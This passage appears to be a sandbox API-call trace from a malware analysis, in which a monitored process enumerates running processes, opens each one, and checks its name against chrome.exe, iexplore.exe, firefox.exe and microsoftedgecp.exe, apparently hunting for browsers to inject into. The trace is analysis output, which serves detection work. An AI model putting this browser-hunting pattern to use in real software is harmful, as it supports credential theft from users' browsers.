	[0210.309] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0210.310] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x36ac
	[0210.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.310] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0210.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.310] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.311] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0210.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.311] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.311] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0210.312] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x36b0
	[0210.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.312] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0210.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.312] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.312] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0210.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.313] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.313] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0210.314] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x36b4
	[0210.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.314] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0210.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.314] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.314] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0210.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.314] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.315] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.315] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x36b8
	[0210.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.315] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.316] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.316] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.316] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.316] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.317] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x36bc
	[0210.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.317] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.318] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.318] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.318] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.318] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.319] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x36c0
	[0210.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.319] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.319] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.320] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.320] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.320] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.321] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x36c4
	[0210.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.321] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.322] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.322] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.322] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.322] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.323] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x36c8
	[0210.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.323] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.323] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.324] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.324] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.324] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.325] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x36cc
	[0210.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.325] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.325] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.326] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.326] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.326] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.327] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x36d0
	[0210.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.327] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.327] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.328] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.328] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.328] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0210.329] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x36d4
	[0210.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.329] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0210.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.329] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.329] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0210.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.330] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.330] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.330] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x36d8
	[0210.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.331] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.331] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.331] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.332] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.332] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0210.332] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x36dc
	[0210.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.333] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.333] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.333] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.333] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.334] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0210.334] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x36e0
	[0210.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.334] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0210.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.335] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.335] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0210.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.336] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.336] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.337] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x36e4
	[0210.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.337] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.337] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.337] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.338] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.338] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0210.338] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x36e8
	[0210.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.339] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0210.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.339] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.339] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0210.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.340] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.340] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0210.340] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x36ec
	[0210.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.341] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0210.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.341] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.341] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0210.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.341] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.342] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0210.342] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x36f0
	[0210.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.342] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0210.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.343] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.343] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0210.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.343] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.343] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0210.344] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x36f4
	[0210.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.344] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0210.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.344] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.345] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0210.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.345] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.345] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0210.346] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0210.346] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0210.347] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x36f8
	[0210.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.347] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0210.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.347] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.348] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0210.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.348] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.349] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0210.349] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x36fc
	[0210.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.350] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0210.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.350] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.350] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0210.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.350] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.351] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0210.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3700
	[0210.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.351] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0210.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.352] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.352] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0210.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.353] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.353] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0210.354] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3704
	[0210.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.354] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0210.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.354] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.354] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0210.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.355] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.355] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0210.356] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3708
	[0210.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.356] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0210.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.356] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.357] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0210.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.357] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.358] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0210.358] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x370c
	[0210.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.358] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
